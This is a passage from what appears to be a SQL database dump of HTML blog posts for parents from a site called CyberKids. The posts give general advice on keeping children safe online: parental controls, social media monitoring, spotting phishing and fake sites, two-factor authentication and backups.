Regular updates, learning about the latest threats, and using reliable security software can go a long way in protecting your family.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Stay Updated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Follow Reputable News Sources</strong></b>: Subscribe to cybersecurity blogs or newsletters.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Update Regularly</strong></b>: Keep all software, devices, and applications up to date to avoid vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Review Policies Periodically</strong></b>: Check security settings on your devices and services often to ensure they meet the latest safety standards.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">An Investment that Pays Off</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider this—a little time and money invested in cybersecurity today can save you from the significant financial and emotional costs of a security breach tomorrow. 
The cleanup process after an incident is often more time-consuming and expensive than taking steps to prevent it in the first place.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some simple proactive measures include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing antivirus software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Using two-factor authentication, starting with your email account, since a compromised mailbox can be used to reset the passwords of your other accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Backing up important files regularly, and keeping at least one copy offline or disconnected from your devices so that ransomware cannot encrypt the backup along with the originals.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The peace of mind that comes from knowing your family’s online presence is secure is priceless.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity in today’s digital landscape is non-negotiable. Parents play an essential role in equipping their families with the skills and tools to stay safe online. 
Whether it’s protecting personal information, educating children about online risks, or staying updated on emerging threats, the responsibility starts at home.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By fostering awareness and good habits, you can safeguard your family from the growing dangers of cyber threats—and ensure that technology enhances, rather than compromises, your loved ones\' lives.</p>', '', NULL, NULL, 1, 'draft', '2023-12-02 03:23:04', '2026-01-12 21:41:44', 'CyberKids', 'Cybersecurity awareness for parents', '', NULL),
(142, '5 Tips for Keeping Your Kids Safe Online', '5-tips-for-keeping-your-kids-safe-online', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet has become an integral part of our lives, offering kids access to incredible opportunities, knowledge, and social connections. However, this digital era also presents a range of risks for children, including cyberbullying, online predators, and exposure to inappropriate content.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It is more important than ever for parents to take a proactive role in teaching kids about online safety and creating a secure digital environment for them. Curious about where to start? Here are five actionable tips to protect your kids in the online world while empowering them to use technology responsibly.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Set Clear Rules and Boundaries</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to keep your kids safe online is by establishing clear rules and boundaries regarding their online activities. 
This means setting specific guidelines for internet usage and consistently communicating these expectations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are some examples of rules parents might enforce:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Setting time limits on devices or internet usage each day.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Defining which websites, apps, and social media platforms are allowable.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Outlining what personal information should never be shared online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Establishing consequences for breaking online safety rules.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When kids know what’s expected of them, it creates an atmosphere of structure and accountability. These boundaries also help minimize risky behaviors, such as falling for online scams or interacting with harmful content.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But this is not just a one-time step. Over time, as your children grow and explore new digital experiences, it’s important to revisit and adjust these rules together. 
Building an ongoing conversation ensures they understand the importance of safe habits while respecting the digital boundaries you’ve put in place.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use Parental Controls</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parental controls can act as your first line of defense in protecting kids online. These tools—built into most devices and internet service providers—allow parents to monitor and restrict their children’s online activity.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Do Parental Controls Help?</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Blocking Harmful Content</strong></b> – Certain websites or media platforms can expose children to inappropriate material. 
Parental controls ensure access is denied to such content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Setting Time Limits</strong></b> – Control features allow you to limit screen time, ensuring kids don’t spend hours glued to their screens.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitoring Activity</strong></b> – Keep tabs on your child’s viewing habits or browsing history to better understand their interests and address potential risks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some popular solutions include browser plugins, dedicated parental control software, and inbuilt device settings offered by platforms like Android or iOS. Tools like Google\'s Family Link or software such as Net Nanny are great starting points.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be transparent with your kids about why you are using parental controls and explain how these tools aim to protect them. When they see this as a collaborative step toward their safety, they’re more likely to accept these measures positively.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Teach Them About Online Safety</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Nothing beats empowering your kids with the skills to protect themselves online. 
By teaching them about online safety early on, you help them recognize potential risks and make informed decisions while browsing the internet.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Topics to Cover in Online Safety Education:</h4>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cyberbullying</strong></b> – Help kids identify the signs, understand its impact, and teach them how to respond if they or their friends are targeted.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Privacy Awareness</strong></b> – Explain the importance of keeping private information—such as their address, school name, or passwords—off the internet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Recognizing Scams</strong></b> – Teach them how to identify phishing emails, suspicious pop-ups, or fake social media profiles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Content Boundaries</strong></b> – Discuss the risks of consuming inappropriate videos, articles, or games.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tailor these discussions to your child’s age and level of understanding. 
For example, younger kids may need simpler language and direct examples, like not talking to strangers online, while teenagers might benefit from deeper conversations about privacy settings or managing their digital footprint.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Lead by example—your children will learn a great deal from observing the way you behave online. Model safe habits like double-checking privacy settings and avoiding oversharing personal details on public platforms.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Monitor Their Social Media Usage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media has become a primary mode of communication for kids and teens, offering both benefits and challenges. While these platforms help them stay connected with friends and express themselves, they also open the door to risks such as cyberbullying, emotional distress from comparison culture, or interactions with strangers.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Parents Can Monitor Social Media:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly check which platforms your kids are using and review their profiles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Talk to your kids about the type of content they share—ensure they avoid oversharing personal details like their location, phone number, or photos with 
identifiable backgrounds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Discuss online etiquette, including kindness and respect when interacting with others.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Encourage them to alert you immediately if they experience or witness inappropriate behavior online.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Apps like Bark or Qustodio help parents monitor social media activity without being overly invasive. However, emphasize trust and transparency by explaining that your role is to guide, not to invade their privacy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, checking in with kids regularly builds an open environment where they feel comfortable discussing their online experiences with you.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Lead by Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your own online habits are powerful teaching tools. 
Kids often mimic their parents, so demonstrating safe and responsible online behavior can leave a lasting impact.</p>\r\n\r\n<h4 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Set a Positive Example:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be cautious about the information you share on social media—this teaches kids to value privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid posting or sharing inappropriate or impulsive content, encouraging thoughtful online behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Practice good cybersecurity habits, such as using strong passwords and enabling two-factor authentication.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, take time to educate yourself about online safety. As the digital landscape evolves, staying informed will allow you to better guide your kids in navigating technological changes. Share what you learn with them in a collaborative way, rather than as a lecture.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open communication, grounded in empathy and trust, is the foundation of any successful online safety strategy. 
When your kids see you setting these positive habits, they’re more likely to follow suit.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Empower Your Kids for the Digital World</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keeping your kids safe online doesn’t mean restricting them from the digital world—it’s about giving them the tools to explore responsibly. By setting clear rules, using smart technologies like parental controls, educating them on risks, and involving yourself in social media monitoring, you can create an online environment that is supportive and secure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Above all, remember that fostering an ongoing dialogue about their digital lives builds the trust and confidence they need to make safe choices on their own. With your guidance, they can fully enjoy the opportunities the internet offers while staying safe from its risks!</p>', '', NULL, NULL, 1, 'draft', '2023-11-12 03:29:35', '2026-01-12 21:41:44', 'CyberKids', '5 Tips for Keeping Your Kids Safe Online', '', NULL),
(143, 'Roadmap for Teaching Cybersecurity to Kids', 'roadmap-for-teaching-cybersecurity-to-kids', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital world is evolving rapidly, with kids spending more and more time online—from playing games and completing schoolwork to socializing on platforms like social media. While the internet offers incredible opportunities for learning and connection, it also comes with risks. Cyberbullying, hacking, identity theft, and online scams are just a few of the threats our kids face daily.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This is why teaching cybersecurity to kids at an early age is no longer optional—it’s essential. By giving them the right tools, knowledge, and habits, we can ensure they grow up navigating the digital world safely, responsibly, and confidently. Below, we’ll walk you through a step-by-step guide on how to introduce cybersecurity to kids in a way that’s engaging, easy to understand, and effective.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Kids Need to Learn Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before we get into the how, it’s important to understand <i><em class=\"italic\">why</em></i> cybersecurity education matters so much for children.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Protecting Personal Information</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids may not understand the full value of personal information, but it’s 
something hackers and scammers crave. Teaching children how to safeguard their names, addresses, and other sensitive data can protect them (and your family) from identity theft and financial scams.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Building Lifelong Skills</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The sooner kids learn about staying safe online, the more prepared they will be as they grow up and technology becomes an even more integral part of their lives. Empowering them with cybersecurity skills early on equips them to make informed decisions and take responsibility for their online behavior in the long-term.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Developing Good Digital Habits</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids are highly impressionable. 
By teaching simple safety concepts—like avoiding suspicious links or using strong passwords—you can instill habits they’ll keep for life.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preventing Cybercrime Victimization</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A strong foundation in cybersecurity can help kids identify and avoid risky situations, making the internet a safer space for them to explore, learn, and enjoy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that we understand the importance, here’s a practical roadmap to help you teach cybersecurity to kids.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Introduce the Basics</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Begin by explaining what cybersecurity is and why it’s important. This can sound daunting, but simple analogies make all the difference. 
For instance, explain that just as we lock the doors to our homes to keep strangers out, we also need to “lock” our online activities to protect them from threats like hackers or scammers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to introduce the basics effectively:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Define cybersecurity as the practice of protecting personal information and online activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Explain who hackers are and the harm they can cause, like stealing personal data or tricking people out of their money.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Highlight the importance of protecting not only their own data but also that of friends, family, and others in the community.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Use Real-Life Scenarios</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children connect better with stories and scenarios they can relate to. 
Share real-life examples to help them understand the risks and consequences of unsafe online behavior.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Show how a phishing scam works by explaining what happens when someone clicks on a suspicious email link.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Create a scenario where someone falls for a fake website and loses money, and explain how they could avoid such traps by reading the URL’s actual domain name carefully and typing known addresses in themselves—remembering that a padlock or HTTPS alone does not prove a site is genuine, since scam sites use HTTPS too.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By using vivid, relatable examples, kids can better grasp the importance of cyber safety.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Teach How to Identify Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now, it’s time to focus on recognition. 
Teach kids how to spot the most common online threats, so they can steer clear of dangers before they escalate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some easy-to-digest tips for kids include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Don’t trust online strangers, even if they seem friendly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Verify the source of emails asking for personal information. Encourage them to ask you or another trusted adult if they’re unsure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Check website URLs carefully—look at the actual domain name, not just the page design. Explain that HTTPS and the padlock symbol only mean the connection is encrypted, not that the site is genuine; scam sites use HTTPS too.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Teach them that suspicious pop-ups are a no-go, and they should never click on random advertisements online.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s all about building awareness. 
The more they can identify threats, the safer they’ll be.</p>\r\n\r\n<h3 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Encourage Responsible Online Behaviour</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just about avoiding threats—it’s also about being a responsible digital citizen.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage kids to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be critical thinkers when reading or seeing something online. Just because something looks real doesn’t mean it is.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Think about the impact of what they post online, as messages or photos shared now might stay on the internet forever.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Speak up if they encounter anything suspicious or uncomfortable online. 
